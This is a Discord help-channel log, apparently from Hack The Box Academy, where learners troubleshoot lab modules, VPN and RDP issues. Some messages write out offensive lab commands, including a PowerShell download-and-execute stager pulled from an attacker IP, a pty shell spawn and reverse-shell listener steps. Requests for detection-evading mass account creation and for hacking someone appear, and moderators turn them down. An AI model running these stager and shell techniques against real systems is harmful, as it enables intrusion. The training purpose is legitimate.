smoky stream
#

Does some1 here heard full cube talks in 16th May? I saw some1 asked if any SAP PT will be in academy and IppSec marked it as answered but I can't find the answer in the Talk ๐Ÿ˜ฎ

fathom pendant
smoky stream
fathom pendant
#

i'm not staff so i wouldn't know; if it's marked as "answered" it means it was addressed during the talk. not necessarily written down anywhere

shrewd vigil
blazing flint
#

Hey everyone,Iโ€™m Phoebe, new around here and really looking forward to getting to know you all. I make my living online. My DMs are always open๐Ÿ˜Š

wraith owl
#

Question on subscription status - if I cancel my subscription do I still maintain the access to all the unlocked modules? Do I get the updates on the unlocked modules for free or this will be extra cubes? And question about CPTS exam - on my last try I miserably failed on both attempts. Is there a different version of the test every time I get a voucher or there is a random pool assigned to each attempt? Asked to know if I will have a frustrating experience with the same wall I've been knocking at for over a week or it will be a slightly different list of tasks?

cold star
fathom pendant
fathom pendant
rustic sage
#

Hello colleagues I am stuck in the skills assessment of file upload attacks I have the upload.php directory that I have decoded in base64 my question is how I do to load it in the upload.php since I have the code with the validations that touches fuzzear but I do not know how to use the directory to load the script and it runs

fathom pendant
#

After you upload your payload, you need to figure out if the upload.php is doing anything to the file to change it

rustic sage
#

And the directory indicated in upload.php is something that has intervention

fathom pendant
willow cargo
#

Or some reason it will only let me talk in here
I canโ€™t talk in general (sorry Ik this is not about modules I just donโ€™t know where else to say this since it wonโ€™t let me)

fathom pendant
willow cargo
#

Oooh I see
Thank you I didnโ€™t realize there were instructions in the welcome channel

cosmic sentinel
#

Hi,
im unable to access splunk apps in the Detecting Windows Attacks with Splunk module

fathom pendant
#

those sections can take a few minutes for the web app to fully load

#

so give it a few minutes and refresh

rustic sage
fathom pendant
#

look closer at the top of the code

cosmic sentinel
rustic sage
fathom pendant
cosmic sentinel
#

also cant access the support bubble on the bottom right, tried different browsers with adblocker/trackers disabled

cosmic sentinel
rustic sage
fathom pendant
rustic sage
fathom pendant
#

not injections really

#

it's just how the file will show up after you successfully uploaded

slate finch
#

Hi, Im looking to set up mass account creation (on mobile) and need someone to set this up technically safe so that we dont trigger any detections and keep trustscore high.

Need someone that can point me into the right direction of finding the best suitable person for this. Compensating well - 6 fig/year package. Happy to pay for any little info also. Thanks in advance

sand rose
#

Hello. I'm doing the nibbles box (Through the getting started module) and I'm backtracking through the steps multiple times, but for the last shell (The root one I'm tyring to escalate to) im just getting a "#" to input stuff instead of an actual shell. The couple of of steps before I appended the monitor.sh file and then did chmod +x monitor.sh and then ran sudo ./monitor.sh with a nc listener up to catch it.

#

But it's not giving me a shell back.

tepid arrow
fathom pendant
sand rose
fathom pendant
#

python3 -c "import pty; pty.spawn('/bin/sh')"

sand rose
plain trench
#

Hey guys, I'm working on the Windows Privilege Escalation module, specifically in the "Interacting with Users" section, and I'm stuck on capturing the NTLM hash of SCCM_SVC. Can anyone give me a hint?

sand rose
#

@fathom pendant it just returned "python3 -c "import pty; pty.spawn..."... if i try ls or pwd like before, it does the same thing. It's just sending me back what ever text i type into it.

sick depot
#

Really poor explanations on the exploiting thick applications module

clear seal
#

Iโ€™m so happy the lab targets seem to be working a lot better over the VPN today lol. Yesterday was such a struggle!

rustic sage
fathom pendant
#

i.e. http://web.site:port/some/location/prepend_file.php

#

you'll need to use a combination of techniques showcased

stark jacinth
#

Anyone that got issues with deploying the lab targets now? Nothing happens, says deploying for 20-25 minutes now..

rustic sage
cedar plume
#

Im struggling with the using web proxies modual specifically the repeating requests part. I have both flags but it still says its wrong when I submit them. Anyone have a soulution

plush pelican
#

hi everyone

quasi wave
#

hi for question 3 of the skills assessment for pivoting, tunneling, and port forwarding module, I am trying to ssh into the server. I know the private key I found works because I used it previously and I can ping the server and reach it from port 80 and 22. But the connection always times out or does not let me ssh into it:

โ”Œโ”€โ”€(kaliใ‰ฟkali)-[~]
โ””โ”€$ ifconfig
docker0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 172.17.0.1  netmask 255.255.0.0  broadcast 172.17.255.255
        ether 02:42:bf:6a:93:1a  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 74 overruns 0  carrier 0  collisions 0

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.0.2.15  netmask 255.255.255.0  broadcast 10.0.2.255
        inet6 fe80::662f:46a4:46dd:e2ff  prefixlen 64  scopeid 0x20<link>
        ether 08:00:27:6e:13:6e  txqueuelen 1000  (Ethernet)
        RX packets 178571  bytes 112816511 (107.5 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 218227  bytes 225873477 (215.4 MiB)
        TX errors 0  dropped 84 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 2879  bytes 639711 (624.7 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2879  bytes 639711 (624.7 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST>  mtu 1600
        inet 10.10.14.196  netmask 255.255.254.0  destination 10.10.14.196
        inet6 fe80::a80d:9457:2cfe:b291  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef:2::10c2  prefixlen 64  scopeid 0x0<global>
        unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00  txqueuelen 500  (UNSPEC)
        RX packets 27  bytes 10433 (10.1 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 48  bytes 14797 (14.4 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

                                                                                                                                                                                           
โ”Œโ”€โ”€(kaliใ‰ฟkali)-[~]
โ””โ”€$ ls
backupscript.exe  chisel_1.10.1_linux_amd64.deb  dnscat2             Documents  go   id_rsa_web_admin  Pictures    Public  Templates             ubuntu@10.129.44.156
chisel            Desktop                        dnscat2-powershell  Downloads  HTB  Music             ptunnel-ng  rpivot  ubuntu@10.129.129.10  Videos
                                                                                                                                                                                           
โ”Œโ”€โ”€(kaliใ‰ฟkali)-[~]
โ””โ”€$ rm id_rsa_web_admin         
                                                                                                                                                                                           
โ”Œโ”€โ”€(kaliใ‰ฟkali)-[~]
โ””โ”€$ ssh -i id_rsa webadmin@10.129.248.138 
^C

Eventually if I don't ^C it it times out and disconnects automatically.

#

can someone help me with this?

#

if I try to ssh in on port 80 it times out

#

but I can access the web shell

#

can someone DM me I'm scared I will reveal too much if we chat here?

#

that's not what this server is for. its a cybersecurity server, pentesting learning server. we are not your personal army.

quasi wave
#

please do not ask anyone to do illegal activity again

tough dagger
#

Alr

quasi wave
#

wait problem solved I'm sshd in

#

ok I am doing this section quite well

safe star
cloud urchin
quasi wave
quasi wave
#

finally connected via ssh now kind of using proxychains to forward nmap requests to the network

#

we'll see how my nmap scan goes

#

sent it through port 9050

#

or at least proxychained it through that

#

we'll see what happens. I think this will hopefully yield good results.

cold star
quasi wave
#

you may need to reconfigure proxychains

cold star
burnt hill
#

hello, I am stuck with the 3rd question of the "Attacking Active Directory & NTDS.dit
" module "https://academy.hackthebox.com/module/147/section/1326", I am attacking the target with netexec, using the fasttrack dictionary, and I've created the user list file, and with the convention for the username gives the hint, but I am not getting success, any clue?

quasi wave
cold star
quasi wave
#

sometimes its difficult but getting through that difficulty is how you learn to hack

cold star
quasi wave
#

no reason you should need to ask elsewhere

cold star
quasi wave
#

that's the thing. there's experienced people on here that can help with HTB better than anywhere else

#

there's no reason to look on HF

cold star
quasi wave
#

I think that if your gonna look on hacking forums for stuff it should be to network with other hackers but as for actually learning, HTB Discord, THM Discord, PentesterLab Discord, or the Discord for whatever learning platform you use is the best possible thing

#

I'm in the middle of nmapping the target network with proxychains because I'm hoping I can solve question 3 of the skills assessment that way

#

we'll see if I'm right. if not I'll ask for help on here

mighty scarab
cold star
dapper moth
wet arrow
#

Hello,

I'm having trouble accessing the Splunk exercise. When I run nmap, port 8000 is listed, and it appears that Splunk is running. However, when I try to access it in the browser at http://10.129.207.255:8000/, I receive the message: "The connection was reset." As a result, I'm unable to complete the related exercises.

Could someone please give me a hand?
Module: Attacking Common Applications
Page: Splunk - Discovery & Enumeration, Attacking Splunk

PD: I tried reseting the target and Pwnbox twice

safe mango
#

If you are not supposed do add a host name then I think you should connect to the ip using netcat

mossy moon
#

anyone know how to find the commonName of a ip?

#

using nmap

safe mango
mossy moon
#

here

#

is the question

#

What is the commonName that the SSL certificate provides? (Format: example.com)

safe mango
#

What you are looking for is a ssl certificate scan on an ip.

#

There is a script for scanning ssl certificates using nmap

mossy moon
#

what is that script?

safe mango
#

So when you scan with nmap, you can choose special features. And the feature to scan ssl is a script called "--script ssl-cert"

#

If you use this feature (script) to scan it will give you all the info you need including CommonName

mossy moon
#

thank you

pearl flint
#

I was reporting a ticket but by mistake submited it in the middle of writing and i cant update text on it so i will send it here:

Ticket ID
#7606273

Module's Link
https://academy.hackthebox.com/module/158/section/1441

Issue Description
Submit the contents of C:\Flag.txt located on the Domain Controller.
spoiler below
VVVV
||seems that last flag can be found tru vrank(172.16.6.25) on file explorer im not sure if thats a some misconfig was it meant to exploit DC to gin that flag||

mellow rapids
#

Hi everyone! I am kinda of stuck in the module after completing everything in the steps

#

On the Cross-Site Scripting Module - session Hijacking, I was able to listen to the server even get the cookie reponse but whe I added in devtool and refresh it does not seem to work in the 'http://exercise_server_IP/hijaking/login.php'

safe mango
mellow rapids
#

After running it a couple of times I notice the cookie does not change. So probably the old one stayed

#

Its giving me 200 codes when receiving the cookie as well

safe mango
mellow rapids
#

I did but when I do still showing the login page

safe mango
#

Dm screenshots

dusk frost
#

Yo do y'all think pentester is a good career option at the moment ?
Like i really like it but people say that there are no entry level jobs,and just no too oversaturated
Also i think it will basically take too long to learn like man i gotta eat smth i don't got 3-4 years to learn it,is it possible to learn it in like idk 1-2 years ?ฤฐ doubt it
What do y'all think,can i make it in a year or two?

real delta
#

Something like help desk is entry

dusk frost
#

Oh

real delta
#

It'll take way longer than a year or 2 to get your foot in the door for cyber in my opinion if you're starting with nothing

dusk frost
#

Damn really ?:(

#

Thanks for your opinion man

safe mango
mellow rapids
real delta
#

It's better to start now than not starting at all

dusk frost
compact patrolBOT
dusk frost
#

Thanks for advices y'all

mellow rapids
dusk frost
mellow rapids
#

Thats my goal too

valid rune
#

@mellow rapids

cloud urchin
#

@valid rune Not what this server is about.

mellow rapids
#

No sir

valid rune
cloud urchin
cloud urchin
valid rune
#

But can you show me a bot

#

If there is a bot to hack someone

#

Or show me how to get on a platform

cloud urchin
valid rune
#

But

mellow rapids
#

The goal is not to hack someone back, that is not ethical. It to make the web and the world a safer place.

valid rune
#

I guess since this isnโ€™t

cloud urchin
#

Don't care. Also not the channel for this type of discussion.

valid rune
#

Ight then I guess this isnโ€™t my server

#

Bye and sorry for wasting your time

mellow rapids
#

@cloud urchin Do you mind looking into the question I asked earlier on a module please?

mellow rapids
young gale
#

xfreerdp wont let me connect it keeps timing out

safe star
young gale
#

found it dw

mellow rapids
mellow rapids
shut wraith
#

Module: Sliver

Section: Persistence

iex(new-object net.webclient).downloadString('http://10.10.14.62:8088/stager.txt')" | iconv -t UTF-16LE | base64 -w 0 how is the stager.txt created ? is it just a PS1 beacon payload ?

mellow rapids
bitter dome
#

Hi! Is this where we can talk about modules we are stuck on in HTB academy?

shut vapor
fathom pendant
#

as it's spoiling paid content

shut vapor
#

right irght I was using soft language

fathom pendant
#

tier 0 content is considered "free" content since you get the cube cost back

bitter dome
#

@fathom pendant ToS?

fathom pendant
#

Terms of Service

bitter dome
#

Thank you! Ok I am going through the Pen Tester path, so not tier 0. I am glad to know there is a community of friendly ethical hackers for us to help each other out if we can ๐Ÿ’–

fathom pendant
#

some of the modules in the path are tier 0; but you can ask general questions like
Some module - Some Section
I'm stuck at performing the attack mentioned/it's taking forever for this attack to run, is that normal

bitter dome
#

Thanks!

#

Just so I know, how do you know if its tier 0? Does it say somewhere in the module?

fathom pendant
#

before you start the module it has the tier on it

#

also: don't expect direct answers to your questions, expect vague but useful hints to get you thinking in the right direction

lucid grail
#

I was doing CPTS starting module and stuck in Nibbles machine . I could not access to Nibbles machine . It is telling that IP address 10.10.10.75 and still could not ping and nmap successfully . I also have a VIP member for lab practice . Either way I was not successful . Could someone please help me to solve the problem ?

cloud urchin
lucid grail
#

Yes I tried . But hosts are unreachable

#

In GUI , everything showing is green color

#

@cloud urchin When I tried from Academy I tried Academy VPN and from VIP I tried from VIP VPN . Both are failed

lusty breach
#

O

delicate token
#

If there is any server maintenance or Unavailable server, They put the warning/notice banner on to half of my screen which do not let me focus on the actual module. Does anyone have a way to get rid of those banners after watching them for once. Really annoying...

rustic sage
#

Has anyone here done the last question on using crack skills assessment

#

I have found the very last exploit, however when I am testing against all seven usernames that I have discovered it doesnโ€™t capture the hash

gaunt forge
#

I'm stuck on attacking common applications, skills assement 2. This is probably really dumb but its on the question What is the name of the public GitLab project?

#

I can't login or do anything to the gitlab project

spiral sapphire
#

Good morning! Has anyone had this issue and successfully solved it? When I RDP to a machine, the keyboard layout is different than mine. For example, if I have to type commands and use special characters like /-(): etc., it's horrible because they're in a different place than on my keyboard. I cannot successfully change the keyboard layout to my country in the machine's settings. Also I haven't found any advice in google. It's literally a nightmare and a red flag for me if I have to RDP in and type commands ....

fickle crystal
#

wassup
htb-student@nix03:~/.cache$ Read from remote host 10.129.255.195: Connection reset by peer
Connection to 10.129.255.195 closed.
client_loop: send disconnect: Broken pipe

#

why do i keep getting this

#

like im locked in '

rustic sage
#

This is where questions go to die lol

fickle crystal
gaunt forge
#

what is using crack skills assement actually named btw lmao

rustic sage
#

Have you done it?

gaunt forge
#

I'm just working on cpts, thats all

rustic sage
#

Iโ€™m not looking to talk about it Iโ€™m looking to get help on the last question ๐Ÿ˜‚

gaunt forge
#

yeah sorry i havent done it, i just meant ive only done modules in cpts so far

wooden seal
rustic sage
#

Using crackmapexec skills assessment. If anyone ever needs help with this, do not hesitate to reach out this was incredibly difficult. I just finished it

gaunt forge
wooden seal
bronze hollow
#

Hello everyone,hows going? I am new here

#

Enthusiastic in learning ethical hacking,need you guys help

compact patrolBOT
sacred dove
#

Submit Flag

Submit root flagุŸ

warped rivet
#

Just bought the Cubes for the pentesting module ๐Ÿ‘€ GL me

storm elk
#

good luck

storm elk
#

@silent prawn feel free to dm me, deleted your message for not spoiling ๐Ÿ™‚

#

dm me with what you have ๐Ÿ˜„

silent prawn
burnt hill
west stratus
#

am i trolling or is the linux privesc page 9 on sudo abuse not accepting the right answer? It should be ||/usr/bin/openssl|| and the solutions says that too but it wont accept it

rustic sage
# storm elk good luck

htb-student@nix03:~$ Read from remote host 10.129.255.195: Connection reset by peer
Connection to 10.129.255.195 closed.
client_loop: send disconnect: Broken pipe

#

htb-student@nix03:~$ Read from remote host 10.129.255.195: Connection reset by peer
Connection to 10.129.255.195 closed.
client_loop: send disconnect: Broken pipe

#

any help ?

#

very helpful community

#

im enjoying this help they giving

#

omg hackthebox community really helpful im so happy

storm elk
#

@rustic sage no need to spam in all the channels

#

be patient, there's people who are working

sullen moon
#

I have just completed the Android Fundamentals Module. One of the last questions asked about finding the UID of the directory for com.android.settings. I got the answer cause I have a rooted phone and I was able to do su inside adb shell. Is the question not doable for those without a rooted device?

zenith depot
storm elk
#

with what ?

zenith depot
#

htb-student@nix03:~/snap$ cd lRead from remote host 10.129.255.195: Connection reset by peer
Connection to 10.129.255.195 closed.
client_loop: send disconnect: Broken pipe

storm elk
#

There's no need to join this server with 2 accounts if you get muted lol

#

and no I can not help you

#

please contact support

zenith depot
#

its been like this for 70 days

storm elk
#

I can't help you, maybe you're using a wrong protocol or try switching your VPN to TCP

zenith depot
#

its okay ill try using the pwnbox

storm elk
#

I can't help with the technical stuff, I am just a Discord mod

west arrow
manic rivet
lavish mango
#

Hello

round fern
thorny kraken
#

You have already got the answer

dapper moth
gusty cape
thorny kraken
#

The one extra is the answer

fathom pendant
#

@gusty cape please refrain from giving direct answers/spoiling :))))))))

gusty cape
thorny kraken
lavish mango
#

๐Ÿ‘€

gusty cape
thorny kraken
#

Sorry 7 you gave 8

round fern
gusty cape
#

oh sh** i got it @thorny kraken

#

no way man, wasted 2 hours of my life and it was infront of me!!

thorny kraken
#

Hahaha if you learnt something, its not a waste

gusty cape
#

true that โค๏ธ thanks a lot @thorny kraken

dapper moth
west arrow
#

need help with the "SOCKS5 Tunneling with Chisel" module.
I can't get chisel working on the pivot host. How do I know what version I have to use for it to be compatible on both my attack host and target??
Module link: https://academy.hackthebox.com/module/158/section/1437

odd pewter
#

Hello, HTB community ๐Ÿ™‚
I'm looking to buy a gift for my older brother, since he is very interested in cybersecurity. One of the ideas I got was to buy him an Academy gift card. My problem is that I have no idea how this works. From what I have seen, the certifications are all around 500$, and that is way more than my budget can cover. In reality, I'm curious about what good can he get from a 50$ gift card, and is it worth it?
Thanks for taking the time, I really appreciate it!

fathom pendant
west arrow
restive vortex
#

Footprinting :IPMI Footprinting

Stuck on last question for a day now, essentially I can't figure out what format hashcat wants from me as I swear I have been doing everything correctly, I've tried a million ways to format the salted hash.
keeps returning this when running hashcat command listed in module along with the salted hash I received.

Hashfile 'ipmi.txt' on line 1 (user:...(cantleakthis): Token length exception
* Token length exception: 1/1 hashes
  This error happens if the wrong hash type is specified, if the hashes are
  malformed, or if input is otherwise not as expected (for example, if the
  --username option is used but no username is present)

lavish mango
#

Hello

restive vortex
#

hi

fathom pendant
fathom pendant
#

Dude you

  1. didn't "find" the channel, it's your channel
  2. This isn't the channel for self promotion
mighty scarab
#

What's the problem if support ppl

fathom pendant
#

It's completely unrelated to this channel

mighty scarab
#

Ok sry for doing that

restive vortex
fathom pendant
#

It's given in the reading

restive vortex
#

yeah I was using 7300

#

so your good to remove the user portion for 7300/IPMI2 SHA1?

fathom pendant
#

Then try method one with --username

#

If that doesn't work, then try method 2

restive vortex
#

i think ill also try running hashcat locally since i can just copy the hashcat file over to my pc, it will speed it up probably

#

--username didnt work when i was testing it

fathom pendant
#

Token exception means that it's not recognized for the mode you're trying

restive vortex
#

yeah I mean it told me that, the thing is like a hundred different times i tried to look it up and every time i did it told me the user portion is meant to be there

fathom pendant
restive vortex
#

oh yeahh i were

#

is that not a good idea?

#

its frustrating because that's what is in the module

thorny kraken
#

I wonder if i was using the wrong mode though

restive vortex
#

how long did it take to crack the hash?

#

I think I might just try using a dictionary attack

#

rockyou wordlist

#

oh

#

found it

#
  • Runtime...: 1 sec
#

@fathom pendant Thank you :)

fathom pendant
restive vortex
#

I did read that however, I had the assumption that the ipmi vendor implementation was the one being used in the module for lack of better words

#

what could I do to identify what ipmi vendor is being used on a target machine?

fathom pendant
#

I believe if you scan it should tell you based on version info

restive vortex
#

nmap?

fathom pendant
#

Ye, i think the msf exploit also tells you, I could be wrong

restive vortex
fathom pendant
#

Step 0. Enumerate :)

open hamlet
#

Hello buddy

cold star
#

Hey guys I am facing issues connecting to rdp like it connectes for one second and disconnect with black screen

#

Already changed the vpn

#

I am on hack the box password attacks attacking lsass

#

Also increasing time out didn't work black screen and then exit network disconnect also launched new instance same issue

tawdry wren
#

Hello everyone! Has anyone solved Prompt Injection Attacks and specifically Jailbreaks I? I don't understand what answer is being sought in the โ€œSolve the lab โ€Jailbreaking 1โ€œโ€ question. By assigning a role I get an answer, but it is not an HTB flag and no options are accepted as correct. Any hints?

astral marlin
cold star
# cold star Also increasing time out didn't work black screen and then exit network disconne...

Okay I fixed it for anyone facing this issue please follow these steps- Got this from hack the box forum-
sudo openvpn --config ~/Downloads/academy-regular.ovpn --mssfix 1200 --tun-mtu 1500

Why this works: The black screen often occurs because VPN packets are too large and get broken into pieces (fragmented) during transmission. When these fragmented packets arrive at their destination, they donโ€™t get reassembled correctly, causing RDP to fail to display properly. The command above fixes this by:

--mssfix 1200: Limits the size of data packets to prevent fragmentation
--tun-mtu 1500: Sets an appropriate tunnel size that matches standard network configurations

and then use xfreerdp
โ””โ”€$ xfreerdp3 /v:10.129.200.144 /u:htb-student /p:HTB_@cademy_stdnt! /timeout:60000 /clipboard /dynamic-resolution

stone wigeon
#

Hy

cold star
cosmic sentinel
vernal tapir
#

I can help you

cosmic sentinel
dark hedge
#

this is illegal

river grove
#

Anyone can give a nudge on the absolute last part of the Advanced XSS and CSRF Exploitation skills assesment?

vernal tapir
#

Google: Reset Discord Password

vernal tapir
dark hedge
#

i dont even know why im replying with this link, we all know youre trying to do something illegal

cold star
west arrow
#

Need help with "DNS tunneling with Dnscat2"
I am using a docker because otherwise I would get a error when "sudo gem install bundler" because of the architecture.
But even with the docker i cannot manage to connect the windows to my dnscat2 server.
Been stuck on this for a day now if anyone remembers how they solved it or why this is happening, help is very appreciated.

west arrow
wet arrow
# safe mango Is it possible that you need to add a host name inside the "/etc/hosts"?

Thanks for the reply, Sherlocky!

It turns out I needed to use https:// instead of http:// to access Splunk. I figured it out finally doing the most painfully obvious thing I somehow managed to overlook. Honestly, it was the kind of mistake that makes you question if your keyboard deserves better fingers. ๐Ÿ˜…

I'm familiar with ports like 80 for HTTP and 443 for HTTPS. Kindly tricky as port numbers are basically just polite suggestions anywayโ€”any service can wear any number if it feels confident enough. ๐Ÿ˜„

bitter dome
wet arrow
wet arrow
#

๐Ÿ‘

slim locust
#

alright Idk if am just dumb or what... but I can not figure this out for the life of me.

Understanding Log Sources & Investigating with Splunk Module

Introduction To Splunk & SPL

The question is: Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through an SPL search against all 4624 events the account name that made the most login attempts within a span of 10 minutes. Enter it as your answer.

HINT: range() can help you answer this question. Use the stats command to calculate the time range. Aggregate functions and Time functions from Splunk's documentation will help you.

I am lost on what to do with this question. Can anyone give me a nudge?

#

my current query is

index=* sourcetype="WinEventLog:Security" EventCode=4624
| bucket _time span=10m
| stats count by _time, Account_Name
| sort - count

#

I have tried to use range, but I seem to not figure it out

cold star
#

the module has provided wrong command from client side becuase dnscat2 automaticlly handles encryption no need to mention it again it wont work

#

new fixed command- Start-Dnscat2 -DNSserver 10.10.15.177 -Domain inlanefreight.local -PreSharedSecret secretkey -Exec cmd

#

also even after getting a window you wont be able to navigate (I was not able to maybe it will be fixed in your case) so just understand the concept and get the flag using rdp

tacit temple
#

Hello everyone , I just joined the hack the box discord community

toxic meteor
#

hey guys need i help in Certified machine when a run gettgtpkinit.py i found errors : Traceback (most recent call last):
File "/home/kali/Downloads/Tracks/Certified/gettgtpkinit.py", line 349, in <module>
main()
~~~~^^
File "/home/kali/Downloads/Tracks/Certified/gettgtpkinit.py", line 345, in main
amain(args)
~~~~~^^^^^^
File "/home/kali/Downloads/Tracks/Certified/gettgtpkinit.py", line 315, in amain
res = sock.sendrecv(req)
File "/usr/lib/python3/dist-packages/minikerberos/network/clientsocket.py", line 85, in sendrecv
raise KerberosError(krb_message)
minikerberos.protocol.errors.KerberosError: Error Name: KDC_ERR_PADATA_TYPE_NOSUPP Detail: "KDC has no support for PADATA type (pre-authentication data)"

tacit temple
#

Anas55 , bro , use chat gpt

cold star
tacit temple
tacit temple
cold star
toxic meteor
# tacit temple Anas55 , bro , use chat gpt

in "KDC_ERR_PADATA_TYPE_NOSUPP" error I think he dump because the KDC don't allow you to auth with certificate but when i saw the solution I didn't saw this problem hahahahaha

#

not a path

#

it is a machine

#

certified machine

cold star
toxic meteor
tacit temple
#

๐Ÿ˜ฏ, bro , actually this is my first day of starting my cybersecurity journey , and I just randomly came across the website , with the help of an AI named roadmap.sh

cold star
tacit temple
#

I have chosen the path : Operating system fundamentals

cold star
toxic meteor
quasi wave
#

running proxychains over nmap again but using -sT option to make sure traffic actually gets forwarded into the internal network

tacit temple
#

Thanks guys

quasi wave
#

its going well I have 20 minutes probably to go until scan completes

cold star
toxic meteor
quasi wave
#

this is for question 3 of skills assessment of pivoting, tunneling, and port forwarding. we'll see if I end up doing it right

cold star
quasi wave
#

I feel like you should do the penetration tester path in order tho

cold star
quasi wave
#

like if your doing nmap module and jumping right into pivoting, tunneling, and port forwarding maybe that's not the smartest move

cold star
toxic meteor
quasi wave
#

the scan is gonna take forever but its fine

#

the ubuntu server doesn't have nmap on it

toxic meteor
#

I will read the module when I finish the machines

cold star
#

Dm me I will share the commands from module

#

Please test this command against your certificate- python3 /opt/PKINITtools/gettgtpkinit.py INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01$ -pfx-base64 MIIStQIBAzCCEn8GCSqGSI...SNIP...CKBdGmY= dc01.ccache

#

and then export the tgt so you can use it- export KRB5CCNAME=dc01.ccache

toxic meteor
#

in the Certified machine you try do shadow credentials (create a certificate and keys) and try request a tgt from this certificate but the KDC don't support auth with certif

cold star
toxic meteor
#

the same error

#

I don't know what should I do

cold star
toxic meteor
cold star
toxic meteor
gloomy furnace
#

Hello guys

cold star
#

Lol, I think I was also facing these issues that's why i left it in between

cold star
gloomy furnace
#

Why I Can't chat in general

#

That's the first Time to join it

cold star
gloomy furnace
cold star
#

On the top

clear seal
#

I just finished the Pass the Hash lesson in password attacks. Am I the only one who feels it was a doozy? Lol

cold star
clear seal
#

In terms of the entire lesson was a ton of info

cold star
cold star
gloomy furnace
#

Bro I search for vรฉrification but I didn't found it

west arrow
cold star
#

send the error here or in my dm's

gloomy furnace
#

I accept the rules and I can't chat for anything

earnest jacinth
#

is it possible to run vscode as root ? trying to debug a nodejs app that is set up with docker and the vscode docker extension requires root access to interact with docker

hushed bolt
#

anyone around to help me troubleshoot a problem? the support chat is not replying.

I cannot seem to connect to openvpn or pwnbox both say offline, general chat clued me in it might be an embed failure but i cant seem to find how to fix it

bitter dome
hushed bolt
#

i'll give that a shot thanks

bright coral
hushed bolt
bitter dome
hushed bolt
#

i believe im doing it correctly it has worked in the past.

sudo apt update
sudo openvpn --config <filename.opvn>

#

openvpn is installed

bitter dome
#

I think that is the issue. Your membership only allows for a limit of time and you used it up for the day

hushed bolt
#

theres a limit on openvpn usage too?

bitter dome
#

so whether you VPN or use the built in VM you cant access it.
I would think there is a limit yes.

#

Seeing as they both get you access to the box/module

hushed bolt
#

bummer, i mean it happened last night at like 11pm but i guess ill come back in 24 hours and see if it resolves itself

#

thanks so much for the help

bitter dome
hushed bolt
#

on the plan page it looks like i should have no time limit on my own VM but who knows

#

vip looks like it gives more servers

bitter dome
#

What Hypervisor are you using?

hushed bolt
#

oracle vitualbox with an instance of parrot OS

bitter dome
#

Ok did you log into HTB on your VM?

hushed bolt
#

yeah

bitter dome
#

So you downloaded the .ovpn file to your VMs downloads right?

hushed bolt
#

mhmm

bitter dome
#

Go to your Downloads folder

hushed bolt
#

ive sucessfully used my vm to complete modules

#

in the past this connection issue is new

#

once this red offline thing came it started not working

bitter dome
#

sudo openvpn <your vpn file>
Try the above command

cold star
bitter dome
#

That worked for me. But I used TCP for connection orriented

cloud urchin
bitter dome
#

Good call out @cloud urchin

fathom pendant
hushed bolt
cloud urchin
bitter dome
#

And from what I learned you only need to download the .ovpn file once as the cert does not expire right @cloud urchin ?

fathom pendant
#

Occasionally you may need to download a new one, especially if there was a maintenance period

#

Each platform has their own vpn file; labs has a few
There's the release arena/competitive vpn which is for the latest box up to Wednesday of that week
The standard vpn, VIP, VIP+ for the machines
The prolab vpn

hushed bolt
#

did this and then is just hanging

bitter dome
#

Youre connected!

#

"Initializing sequence complete"

hushed bolt
#

it didnt kick me back to $ ?

soft moon
#

mmmm sudo openvpn files

bitter dome
#

You need that to run in the background

hushed bolt
#

so open another terminal?

bitter dome
hushed bolt
#

so at least academy is working, i wonder why main does that but timesout and loops endlessly

soft moon
#

yes or another tab like so

round fern
hushed bolt
#

thanks for getting this at least working i can continue to study

soft moon
#

its a long journey but enjoy it

polar widget